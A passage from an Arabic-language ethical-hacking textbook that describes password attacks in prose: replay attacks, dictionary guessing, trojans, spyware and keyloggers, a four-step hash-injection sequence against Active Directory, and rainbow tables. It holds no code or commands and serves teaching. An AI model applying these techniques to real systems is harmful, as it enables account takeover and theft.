‫‪TCP‬واﻟﺳرﻋﺔ‪ .‬ھذا اﻷﺳﻠوب ﻣن اﻟﺻﻌب ﻧﺳﺑﯾﺎ ارﺗﻛﺎﺑﮫ وﯾﻣﻛن ان ﯾﻛﺳر ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ﺑﺈﺑطﺎل ﺣرﻛﺔ اﻟﻣرور‪.‬‬

‫ﻓﻲ ھﺟوم اﻹﻋﺎدة ‪ ،replay attack‬ﯾﺗم اﻟﺗﻘﺎط اﻟﺣزم ﺑﺎﺳﺗﺧدام ادوات اﻟﺗﻧﺻت )‪ .(sniffer tool‬ﺑﻌدھﺎ ﯾﺗم اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‬
‫ﻣن اﻟﺣزﻣﮫ‪ ،‬ﺛم ﯾﺗم وﺿﻊ اﻟﺣزﻣﮫ ﻣرة أﺧرى ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﺳﺗﺧدم ﻹﻋﺎدة اﻟﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ ‪replay‬‬
‫‪bank transactions‬أو أﻧواع أﺧرى ﻣﻣﺎﺛﻠﺔ ﻣن ﻧﻘل اﻟﺑﯾﺎﻧﺎت أﻣﻼ ﻓﻲ ﺗﻛرار أو ﺗﻐﯾﯾر اﻷﻧﺷطﺔ‪ ،‬ﻣﺛل اﻟوداﺋﻊ أو اﻟﺗﺣوﯾﻼت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪326‬‬

‫‪Active Online Attack: Password Guessing‬‬


‫اﻟﺟﻣﯾﻊ ﯾﻌرف اﺳم اﻟﻣﺳﺗﺧدم اﻟﺧﺎص ﺑك‪ ،‬وﻟﻛن ﻛﻠﻣﺔ اﻟﻣرور ھو ﺳر ﯾﺟب اﻻﺣﺗﻔﺎظ ﺑﮫ ﺟﯾدا ﻣن اﺟل اﻟﺣﻔﺎظ ﻋﻠﻰ اﻵﺧرﯾن ﺑﻌﯾدا ﻋن‬
‫اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﺎﻣﻼت اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻣﻊ اﻟﻣﺳﺎﻋدة ﻣن ﻣﻧﮭﺟﯾﺎت ھﺟوم اﻟﻘﺎﻣوس)‪ ، (dictionary attack‬ﻓﺎن اﻟﻣﺗﺳﻠل ﯾﺣﺎول اﻟﻌدﯾد ﻣن‬
‫اﻟوﺳﺎﺋل ﻟﺗﺧﻣﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻓﻲ ھذه اﻟﻣﻧﮭﺟﯾﺔ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﺄﺧذ ﻣﺟﻣوﻋﺔ ﻣن ﻛﻠﻣﺎت واﺳﻣﺎء اﻟﻘﺎﻣوس )‪ ،(dictionary‬وﯾﺟﻌل‬
‫ﺟﻣﯾﻊ اﻟﺗوﻟﯾﻔﺎت اﻟﻣﻣﻛﻧﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬اﻟﻣﮭﺎﺟم ﯾﻧﻔذ ھذا اﻷﺳﻠوب ﻣﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺧﻣن اﻟﻣﺋﺎت أو اﻵﻻف ﻣن‬
‫اﻟﻛﻠﻣﺎت ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة‪ .‬ھذا ﯾﺟﻌل ﻣن اﻟﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﮭم ﻓﻲ ﻣﺣﺎوﻟﺔ اﻟﻌدﯾد ﻣن اﻻﺧﺗﻼﻓﺎت‪different ،backwards words :‬‬
‫‪ ،capitalization‬إﺿﺎﻓﺔ أرﻗﺎم اﻟﻰ اﻟﻧﮭﺎﯾﺔ‪ ،‬اﻟﺦ‪.‬‬
‫ﻟﺗﺳﮭﯾل ھذا ﺑدرﺟﺔ أﻛﺑر‪ ،‬ﻓﻘد ﺑﻧﺎ ﻣﺟﺗﻣﻊ اﻟﻣﮭﺎﺟﻣﯾن اﻟﻘواﻣﯾس اﻟﻛﺑﯾرة اﻟﺗﻲ ﺗﺗﺿﻣن ﻛﻠﻣﺎت ﻣن ﻟﻐﺎت أﺟﻧﺑﯾﺔ‪ ،‬أو أﺳﻣﺎء اﻷﺷﯾﺎء واﻷﻣﺎﻛن‬
‫واﻟﺑﻠدات ﻋﻠﻰ ﻏرار ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن أﯾﺿﺎ ﻓﺣص اﻟﻣﻼﻣﺢ اﻟﺧﺎﺻﺔ ﺑك ﻟﻠﺑﺣث ﻋن اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﻗد ﺗﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻛﻠﻣﺔ ﻣرور اﻟﺟﯾدة ﻣن اﻟﺳﮭل أن ﻧﺗذﻛرھﺎ‪ ،‬وﻟﻛن ﻣن اﻟﺻﻌب ﺗﺧﻣﯾﻧﮭﺎ‪ ،‬ﻟذﻟك ﺗﺣﺗﺎج ﻟﺣﻣﺎﯾﺔ ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ‬
‫ﺟﻌﻠﮭﺎ ﺗظﮭر ﺑﺷﻛل ﻋﺷواﺋﻲ ﻋن طرﯾﻖ إدﺧﺎل أﺷﯾﺎء ﻣﺛل اﻷرﻗﺎم وﻋﻼﻣﺎت اﻟﺗرﻗﯾم‪ .‬ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك أﻛﺛر ﺗﻌﻘﯾدا‪ ،‬ﻟﺗﺻﺑﺢ أﻛﺛر ﺗﻌﻘﯾدا‬
‫ﻋﻠﻰ اﻟدﺧﯾل ﻟﻛﺳرھﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪327‬‬

‫ﺑﻌض اﻻﻋﺗﺑﺎرات ﻋن اﺳﺗﺧدام ﻋﻣﻠﯾﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور وھﻲ ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ -‬ﯾﺄﺧذ وﻗﺗﺎ طوﯾﻼ ﻟﺗﺧﻣﯾﻧﮭﺎ‪.‬‬
‫‪ -‬ﯾﺗطﻠب ﻛﻣﯾﺎت ھﺎﺋﻠﺔ ﻣن اﻟﻧطﺎق اﻟﺗرددي ﻟﻠﺷﺑﻛﺔ‪.‬‬
‫‪ -‬ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ‪.‬‬
‫‪Active Online Attack: Trojan/Spyware/Keylogger‬‬
‫ﺣﺻﺎن طروادة ‪Trojan‬ھو ﺷﻔرة ﺻﻐﯾرة ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣﻊ ﺑرﻧﺎﻣﺞ رﺋﯾﺳﻲ ﻣن اﻟﺑراﻣﺞ ذات اﻟﺷﻌﺑﯾﺔ اﻟﻌﺎﻟﯾﺔ‪ ،‬وﯾﻘوم ﺑﺑﻌض اﻟﻣﮭﺎم اﻟﺧﻔﯾﺔ‪ ،‬ﻏﺎﻟﺑﺎ ً‬
‫ﻣﺎ ﺗﺗرﻛز ﻋﻠﻰ إﺿﻌﺎف ﻗوى اﻟدﻓﺎع ﻟدى اﻟﺿﺣﯾﺔ أو اﺧﺗراق ﺟﮭﺎزه وﺳرﻗﺔ ﺑﯾﺎﻧﺎﺗﮫ‪.‬‬
‫ھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪/‬اﻟﻣدﻣرة اﻟﺗﻲ ﻻ ﺗﺗﻧﺎﺳﺦ ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮭﺎ واﻟذي ﯾظﮭر ﻟﻛﻲ ﯾؤدي وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮭﺎ وﻟﻛن ﺑدﻻ ﻣن ذﻟك ﯾﻧﺳﺦ‬
‫ﺣﻣوﻟﺗﮫ اﻟﺧﺑﯾﺛﺔ‪ .‬اﻟﺑرﻧﺎﻣﺞ ﯾﺑدو ﻓﻲ اﻟﺑداﯾﺔ ﻷداء وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮫ‪ ،‬وﻟﻛن ﻓﻲ واﻗﻊ اﻻﻣر اﻧﮫ ﯾﺳرق اﻟﻣﻌﻠوﻣﺎت أو ﯾﺿر اﻟﻧظﺎم‪ .‬وﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن ﯾﻌﺗﻣد ﻋﻠﻰ اﻷﺑواب اﻟﺧﻠﻔﯾﺔ )‪(backdoor‬أو اﻟﺛﻐرات اﻷﻣﻧﯾﺔ اﻟﺗﻲ ﺗﺗﯾﺢ اﻟوﺻول اﻟﻐﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻛﻣﺑﯾوﺗر أو اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬
‫وھذه اﻷﺑواب اﻟﺧﻠﻔﯾﺔ ﺗﻣﯾل إﻟﻰ أن ﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﻌﺎدﯾﯾن‪ .‬أﺣﺻﻧﺔ طروادة ﻻ ﺗﺣﺎول ﺣﻘن ﻧﻔﺳﮭﺎ ﻓﻲ ﻣﻠﻔﺎت أﺧرى ﻣﺛل‬
‫ﻓﯾروﺳﺎت اﻟﻛﻣﺑﯾوﺗر‪ .‬أﺣﺻﻧﺔ طروادة ﻗد ﺗﺳرق اﻟﻣﻌﻠوﻣﺎت‪ ،‬أو ﺗﺿر ﺑﺄﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪ .‬وﻗد ﺗﺳﺗﺧدم اﻟﺗﻧزﯾﻼت ﺑواﺳطﺔ اﻟﻣﺣرﻛﺎت‬
‫أو ﻋن طرﯾﻖ ﺗﺛﺑﯾت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت أو اﻟﺗطﺑﯾﻘﺎت اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت ﻣن أﺟل اﻟوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪ .‬واﻟﻣﺻطﻠﺢ‬
‫ﻣﺷﺗﻖ ﻣن ﻗﺻﺔ ﺣﺻﺎن طروادة ﻓﻲ اﻷﺳﺎطﯾر اﻟﯾوﻧﺎﻧﯾﺔ ﻷن أﺣﺻﻧﺔ طروادة ﺗﺳﺗﺧدم ﺷﻛﻼ ﻣن أﺷﻛﺎل "اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ"‪ ،‬وﺗﻘوم ﺑﺗﻘدﯾم‬
‫ﻧﻔﺳﮭﺎ ﻋﻠﻰ أﻧﮭﺎ ﻏﯾر ﻣؤذﯾﺔ‪ ،‬وﻣﻔﯾدة‪ ،‬ﻣن أﺟل إﻗﻧﺎع اﻟﺿﺣﺎﯾﺎ ﻟﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬

‫ﺑراﻣﺞ اﻟﺗﺟﺳس )‪ (spyware‬ھﻲ ﺑراﻣﺞ ﺣﺎﺳوﺑﯾﺔ ﺗﺛﺑت ﺧﻠﺳﺔ ﻋﻠﻰ أﺟﮭزة اﻟﺣﺎﺳوب ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن أو ﻟﻠﺳﯾطرة ﺟزﺋﯾًﺎ ﻋﻠﻰ‬
‫اﻟﺣﺎﺳوب اﻟﺷﺧﺻﻲ‪ ،‬وھذا ﻣن دون ﻋﻠم اﻟﻣﺳﺗﺧدم‪ .‬وﻓﻲ ﺣﯾن أن اﻻﺳم )ﺑراﻣﺞ اﻟﺗﺟﺳس( ﯾﺷﯾر إﻟﻰ اﻟﺑراﻣﺞ اﻟﺳرﯾﺔ اﻟﺗﻲ ﺗراﻗب ﺳﻠوك‬
‫اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬إﻟﻰ أن ﻣﮭﺎﻣﮭﺎ ﺗﺗﺟﺎوز ﺑﻛﺛﯾر ﻣﺟرد اﻟرﺻد‪ .‬ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﻣﻛﻧﮭﺎ ﺟﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ ،‬ﻣﺛل ﺗﺻﻔﺢ اﻹﻧﺗرﻧت‪،‬‬
‫ورﺻد اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ .‬وﯾﻣﻛن ﻟﮭذه اﻟﺑراﻣﺞ أﯾﺿﺎ أن ﺗﺳﯾطر ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺻﺎب ﺑﮭﺎ‪ ،‬وﺗﺗﺣﻛم ﺑﮫ وﺗﻘوم ﺑﻌدة ﻣﮭﺎم‪ ،‬ﻣﺛل‪:‬‬
‫ﺗرﻛﯾب ﺑراﻣﺞ إﺿﺎﻓﯾﺔ‪ ،‬ﺗﺣوﯾل ﻋﺎﺋدات دﻋﺎﺋﯾﺔ ﻟطرف ﺛﺎﻟث‪ ،‬ﺗﻐﯾﯾر اﻟﺻﻔﺣﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻣﺳﺗﻌرض اﻟوﯾب‪ ،‬إﻋﺎدة ﺗوﺟﯾﮫ ﻣﺳﺗﻌرض اﻟوﯾب‪،‬‬
‫ﺗوﺟﯾﮫ ﻟﻣواﻗﻊ وﯾب ﺿﺎرة وﻣﻔﺧﺧﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ان ﺗﺗﺳﺑب ﻓﻲ اﻟﻣزﯾد ﻣن اﻟﻔﯾروﺳﺎت‪ .‬ﯾﻣﻛن أﯾﺿﺎ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس أن ﺗﻐﯾر إﻋدادات‬
‫اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻣﻣﺎ ﻗد ﯾؤدي إﻟﻰ ﺑطﺋﮫ واﻟﺗﺄﺛﯾر ﻋﻠﻰ اﻻﺗﺻﺎل ﺑﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪ .‬وﻣﻊ ظﮭور ﺑراﻣﺞ اﻟﺗﺟﺳس ظﮭرت ﻣﻌﮭﺎ ﺻﻧﺎﻋﺎت ﺻﻐﯾرة ﺣﺗﻰ‬
‫ﻓﻲ اﻟﺗﻌﺎﻣل ﻣﻊ ﻣﻛﺎﻓﺣﺗﮭﺎ‪ ،‬وﻗد أﺻﺑﺣت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻣن أھم اﻟﺑراﻣﺞ ﻓﻲ ﻣﺟﺎل أﻣن اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﻗد أﺻدرت ﻋدة ﻗواﻧﯾن ﻓﻲ ﻣﺧﺗﻠف‬
‫أﻧﺣﺎء اﻟﻌﺎﻟم ﺗدﯾن اﻟﻣﺗﺳﺑﺑﯾن ﺑﮭذه اﻟﺑراﻣﺞ واﻟﺗﻲ ﺗرﻛب ﺧﻔﯾﺔ ﻓﻲ اﻟﻛﻣﺑﯾوﺗر ﺑﮭدف اﻟﺳﯾطرة ﻋﻠﯾﮫ‪.‬‬

‫‪ Keylogger‬ﯾﺳﻣﻰ راﺻد ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ أو أﺣد ﺑراﻣﺞ اﻟﺗﺟﺳس وھو ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ‬
‫ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك‪ .‬ﺣﯾث ﯾﻘوم ﺑرﻧﺎﻣﺞ اﻟﺗﺟﺳس ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت‬
‫ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ‪ ،‬وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد‬
‫أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ‪ .‬ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ .‬ﻓﻲ‬
‫ﻣﻧﺗﺻف ﺷﮭر ﻓﺑراﯾر ﺳﻧﺔ ‪ ،2009‬ھﺎﺟﻣت اﻟﺷرطﺔ اﻟﻔﯾدراﻟﯾﺔ اﻟﺑرازﯾﻠﯾﺔ ﻣواﻗﻊ ﻓﻲ اﻟﻣدﯾﻧﺔ اﻟﺟﻧوﺑﯾﺔ وﻣﻧﺎطﻖ أﺧرى وأﻟﻘوا اﻟﻘﺑض ﻋﻠﻰ ‪55‬‬
‫ﺷﺧﺻﺎ ً – ﺗﺳﻌﺔ ‪ Keylogging‬ﻣﻧﮭم ﺗﺣت اﻟﺳن اﻟﻘﺎﻧوﻧﻲ – ﺑﺗﮭﻣﺔ ﻧﺷر ﺑراﻣﺞ ﻣﺧﺗﻠﻔﺔ ﻓﻲ أﺟﮭزة أﻋداد ﻛﺑﯾره ﻣن اﻟﻣواطﻧﯾن اﻟﺑرازﯾﻠﯾﯾن‬
‫وﺳﺟﻠت ﻣﺎ ﻛﺗﺑوه ﺧﻼل اﺳﺗﺧداﻣﮭم ﻟﻠﻛﻣﺑﯾوﺗر ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎﺑﺎﺗﮭم اﻟﺑﻧﻛﯾﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ...‬اﻟﺑراﻣﺞ اﻟﺻﻐﯾرة ﺟدا ً ﻗﺎﻣت ﺑﺗﺳﺟﯾل أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت ﻣرورھم وأرﺳﻠﺗﮭﺎ إﻟﻰ أﻓراد اﻟﻌﺻﺎﺑﺔ‪ ...‬اﻟﻣﺑﺎﻟﻎ اﻟﺗﻲ ﺗﻣت ﺳرﻗﺗﮭﺎ ﺑﮭذه اﻟطرﯾﻘﺔ؟ ﻣﻧذ ﺑداﯾﺗﮭم اﻟﻌﻣل ﺑﮭذا اﻷﺳﻠوب ﻓﻲ‬
‫ﺷﮭر ﻣﺎﯾو ﻣن اﻟﻌﺎم اﻟﻣﻧﺻرم‪ 4.7 :‬ﻣﻠﯾون دوﻻر ﻣن ﻣﺋﺗﻲ ﺣﺳﺎب ﺑﻧﻛﻲ ﻣﺧﺗﻠف ﻓﻲ ﺳﺗﺔ ﺑﻧوك‪.‬‬

‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ Keylogger ،‬ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋن ﻣﺣﺗوﯾﺎت ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗﺗﺄﻟف ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣن ﻧظﺎم‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺛﺑﯾت ‪ Keylogger‬ﻋﻠﯾﮫ‪.‬‬

‫‪Active Online Attack: Hash Injection Attack‬‬


‫ھﺟوم ﺣﻘن اﻟﮭﺎش )‪ (Hash Injection Attack‬ھو ﻣﻔﮭوم ﻟﺣﻘن ‪ compromised hash‬ﻓﻲ ﺟﻠﺳﺔ ﻣﺣﻠﯾﺔ ﺛم ﯾﺗم اﺳﺗﺧدام ھذا اﻟﮭﺎش‬
‫ﻟﻠﻣﺻﺎدﻗﺔ إﻟﻰ ﻣوارد اﻟﺷﺑﻛﺔ‪ .‬وﯾﺗم ھذا اﻟﮭﺟوم ﺑﻧﺟﺎح ﻓﻲ أرﺑﻊ ﺧطوات‪ .‬وھم‪:‬‬
‫‪1- The hacker compromises one workstation/server using a local/remote exploit‬‬
‫ﺣﯾث ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑﺎﺧﺗراق ﺧﺎدم او ﺟﮭﺎز ﻋﻣﯾل ﻣن ﺧﻼل ‪ exploit‬ﺳواء ﻣﺣﻠﯾﺎ او ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪328‬‬

‫‪2- The hacker extracts logged-on hashes and finds a logged-on domain admin account hash‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺎت اﻟﺗﺳﺟﯾل ﺛم ﯾﺟد اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺳﺟﯾل ﻣن ﻗﺑل ﻣﺳﺋول اﻟدوﻣﯾن‪.‬‬
‫‪3- The hackers use the hash to log on the domain controller‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧدام ھذا اﻟﮭﺎش ﻟﺗﺳﺟﯾل اﻟدﺧول اﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬
‫‪4- The hacker extracts all the hashes in the Active Directory database and can now satirize any account‬‬
‫‪in the domain.‬‬
‫اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج ﻛﺎﻓﺔ اﻟﮭﺎش اﻟﻣوﺟودة ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ Active Directory‬وﯾﻣﻛﻧﮫ اﻵن ﯾﺳﺧر أي ﺣﺳﺎب ﻓﻲ اﻟدوﻣﯾن‪.‬‬

‫‪Offline Attack: Rainbow Attacks‬‬

‫‪ Offline Attack‬ﺗﺣدث ﻋﻧد ﯾﻘوم اﻟدﺧﯾل ﺑﺎﻟﺗﺣﻘﻖ ﻣن ﺻﺣﺔ ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﺣﯾث ﯾﻼﺣظ ﻛﯾف ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬إذا ﺗم ﺗﺧزﯾن أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠف ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﻓﺎن ھذا ﯾﺻﺑﺢ ﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﮫ أو ﻟﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺟب أن ﺗﻛون ﻗﺎﺋﻣﺔ‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﻣﺣﻣﯾﮫ واﻻﺣﺗﻔﺎظ ﺑﮭﺎ ﻓﻲ ﺷﻛل ﻏﯾر ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﻣﺛل اﻟﺷﻛل اﻟﻣﺷﻔر‪ Offline Attack .‬ھﻲ ھﺟﻣﺎت ﻣﺿﯾﻌﺔ ﻟﻠوﻗت‪ .‬ﻛﺎﻧت‬
‫ﻣن ﻗﺑل ﻧﺎﺟﺣﺔ ﻷن ‪ LM hash‬ﯾﻣﻠك ﻧﻘطﺔ ﺿﻌف وھﻲ ﺻﻐر وﻗﺻر طول‪ . keyspace‬وﺗﺗوﻓر ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻋﻠﻰ‬
‫ﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪.‬‬
‫ھﻧﺎك ﻧوﻋﺎن ﻣن ھﺟﻣﺎت ‪ Offline Attack‬اﻟﺗﻲ ﯾﺳﺗﺧدﻣﺎه اﻟﻣﮭﺎﺟم ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪Rainbow Attacks -‬‬
‫‪Distributed network Attacks -‬‬
‫‪Rainbow Attacks‬‬
‫‪ Rainbow attack‬ھو ﺗﻧﻔﯾذ ﻟﺗﻘﻧﯾﺔ ‪Cryptanalytic time-memory trade-off .cryptanalytic time-memory trade-off‬‬
‫ھو اﻷﺳﻠوب اﻟذي ﯾﺗطﻠب وﻗﺗﺎ أﻗل ﻟﺗﺣﻠﯾل اﻟﺷﻔرات‪ .‬ﻓﺈﻧﮫ ﯾﺳﺗﺧدم ﺑﺎﻟﻔﻌل ﺣﺳﺎب اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻓﻲ اﻟذاﻛرة ﻟﻛﺳر اﻟﺗﺷﻔﯾر‪ .‬ﻓﻲ ھﺟوم‬
‫‪ ،Rainbow attack‬ﯾﺳﺗﺧدم ﻧﻔس اﻷﺳﻠوب؛ ﺣﯾث ﯾﺗم إﻧﺷﺎء ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ ﺟدول ﯾﺣﺗوي ﻋﻠﻰ ھﺎش ﻟﻛﻠﻣﺎت ﻣرور ﺳﺎﺑﻘﮫ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ‬
‫اﻟذاﻛرة‪ .‬وﯾﺳﻣﻰ ﻣﺛل ھذا اﻟﺟدول "‪." rainbow table‬‬
‫‪Rainbow Table‬‬
‫‪ Rainbow table‬ھو ﺟدول ﺑﺣث اﺳﺗﺧدم ﺧﺻﯾﺻﺎ ﻓﻲ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻟﻧص ﻋﺎدي ﻣن ﻧص ﻣﺷﻔر)‪ . (cipher text‬ﯾﺳﺗﺧدم‬
‫اﻟﻣﮭﺎﺟم ھذا اﻟﺟدول ﻓﻲ اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﻣرور وﯾﺣﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﻣرور ﻣن ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪Computed Hashes‬‬
‫اﻟﻣﮭﺎﺟم ﯾﺣﺳب اﻟﮭﺎش ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪ ،‬ﺛم ﯾﻘﺎرن ذﻟك ﻣﻊ ﺟدول ھﺎش ﻣﺣﺳوب ﻣن ﻗﺑل )‪.(Rainbow table‬‬
‫إذا ﺗم اﻟﻌﺛور ﻋﻠﻰ ﺗطﺎﺑﻖ‪ ،‬إذا ﻓﺎن ﻛﻠﻣﺔ اﻟﻣرور ﺗم ﺣﻠﮭﺎ‪.‬‬
‫‪Compare the Hashes‬‬
‫ﻣن اﻟﺳﮭل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل ﻣﻘﺎرﻧﺔ ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺳﺗوﻟﯾت ﻋﻠﯾﮭﺎ ﺑﺟدول ﻣﺣﺳوب ﻣﺳﺑﻘﺎ)‪. (pre-computed tables‬‬
‫‪Pre-Computed Hashes‬‬
